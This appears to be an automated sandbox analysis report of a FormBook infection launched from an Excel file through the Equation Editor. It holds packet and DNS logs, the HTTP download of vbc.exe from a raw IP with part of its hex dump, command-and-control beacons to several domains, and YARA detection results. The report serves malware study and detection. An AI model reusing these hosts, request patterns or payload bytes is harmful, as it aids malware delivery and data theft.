                                              Sep 15, 2021 11:41:57.752060890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923682928 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923718929 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923741102 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923765898 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923780918 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923789024 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923810005 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923824072 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923837900 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923846006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923856020 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923857927 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923876047 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923880100 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923901081 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923902035 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923916101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923923969 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923933029 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923944950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923962116 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923969984 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.923978090 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.923993111 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.924009085 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.924015045 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:57.924032927 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.924050093 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:57.926304102 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096196890 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096235991 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096261024 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096282005 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096301079 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096323013 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096344948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096362114 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096365929 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096385956 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096406937 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096417904 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096429110 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096443892 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096451044 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096452951 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096471071 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096478939 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096492052 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096493006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096512079 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096532106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096549988 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096554995 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096570015 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096575022 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096590996 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096592903 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096611023 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096615076 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096632957 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096633911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096653938 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096656084 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096676111 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096695900 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096714973 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096718073 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096734047 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096739054 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096751928 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096756935 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096774101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096776962 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096793890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096796989 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096812010 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096817017 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096837044 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.096843958 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.096857071 CEST8049165198.12.84.109192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 15, 2021 11:43:17.547328949 CEST5216753192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:17.581933975 CEST53521678.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:22.596507072 CEST5059153192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:22.714829922 CEST53505918.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:28.594424963 CEST5780553192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:28.637029886 CEST53578058.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:33.835074902 CEST5903053192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:33.886842012 CEST53590308.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:39.212805986 CEST5918553192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:39.257781982 CEST53591858.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Sep 15, 2021 11:43:17.547328949 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.hansel-design.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:22.596507072 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.aubergetoitrouge.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:28.594424963 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.corpmat.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:33.835074902 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.afishin.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:39.212805986 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.boxtobookshelf.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Sep 15, 2021 11:43:17.581933975 CEST8.8.8.8192.168.2.220x8eb8Name error (3)www.hansel-design.comnonenoneA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:22.714829922 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.aubergetoitrouge.comaubergetoitrouge.comCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:22.714829922 CEST8.8.8.8192.168.2.220xc18cNo error (0)aubergetoitrouge.com144.217.61.66A (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:28.637029886 CEST8.8.8.8192.168.2.220xfc43No error (0)www.corpmat.comcorpmat.comCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:28.637029886 CEST8.8.8.8192.168.2.220xfc43No error (0)corpmat.com34.102.136.180A (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:33.886842012 CEST8.8.8.8192.168.2.220x9c63No error (0)www.afishin.comafishin.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:33.886842012 CEST8.8.8.8192.168.2.220x9c63No error (0)afishin.xshoppy.shop75.2.89.208A (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:39.257781982 CEST8.8.8.8192.168.2.220x30e0No error (0)www.boxtobookshelf.comboxtobookshelf.comCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:39.257781982 CEST8.8.8.8192.168.2.220x30e0No error (0)boxtobookshelf.com34.98.99.30A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 198.12.84.109
                                              • www.aubergetoitrouge.com
                                              • www.corpmat.com
                                              • www.afishin.com
                                              • www.boxtobookshelf.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249165198.12.84.10980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:41:57.402611017 CEST0OUTGET /cmd/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 198.12.84.109
                                              Connection: Keep-Alive
                                              Sep 15, 2021 11:41:57.576512098 CEST1INHTTP/1.1 200 OK
                                              Date: Wed, 15 Sep 2021 09:41:57 GMT
                                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
                                              Last-Modified: Wed, 15 Sep 2021 04:42:06 GMT
                                              ETag: "83800-5cc0151fdab7b"
                                              Accept-Ranges: bytes
                                              Content-Length: 538624
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02 7b 07 00 00 04 58 54 2b 0d 04 04 4a 02 7b 07 00 00 04 58 54 2b 00 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 45 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 8b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 19 8d 10 00 00 01 0a 2b 00 06 2a 22 02 28 15 00 00 0a 00 2a 00 00 00 13 30 02 00 26 00 00 00 04 00 00 11
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0.jM `@ @MO`L H.textp- . `.rsrc`0@@.reloc6@BLMH?_oP~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rp+*0+*"(*0&


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249166144.217.61.6680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:22.833062887 CEST565OUTGET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.aubergetoitrouge.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:23.548243999 CEST566INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 15 Sep 2021 09:43:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-Powered-By: PHP/7.2.34
                                              Pragma: no-cache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Set-Cookie: PHPSESSID=fifvcc2msr8fmhvo5t3hl5aru1; path=/
                                              Location: http://aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7
                                              X-Powered-By: PleskLin


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:28.657859087 CEST567OUTGET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.corpmat.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:28.772924900 CEST567INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.224916875.2.89.20880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:33.907896996 CEST568OUTGET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.afishin.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:34.201092958 CEST569INHTTP/1.1 301 Moved Permanently
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.224916934.98.99.3080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:39.279041052 CEST570OUTGET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.boxtobookshelf.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:39.395982027 CEST570INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 1256 Parent PID: 596

                                              General

                                              Start time:11:41:21
                                              Start date:15/09/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f120000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: EQNEDT32.EXE PID: 2916 Parent PID: 596

                                              General

                                              Start time:11:41:45
                                              Start date:15/09/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: vbc.exe PID: 2028 Parent PID: 2916

                                              General

                                              Start time:11:41:48
                                              Start date:15/09/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x330000
                                              File size:538624 bytes
                                              MD5 hash:A3F424F32B637CB917E6596FAE56E401
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Analysis Process: vbc.exe PID: 1292 Parent PID: 2028

                                              General

                                              Start time:11:41:50
                                              Start date:15/09/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\vbc.exe
                                              Imagebase:0x330000
                                              File size:538624 bytes
                                              MD5 hash:A3F424F32B637CB917E6596FAE56E401
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 1292

                                              General

                                              Start time:11:41:53
                                              Start date:15/09/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
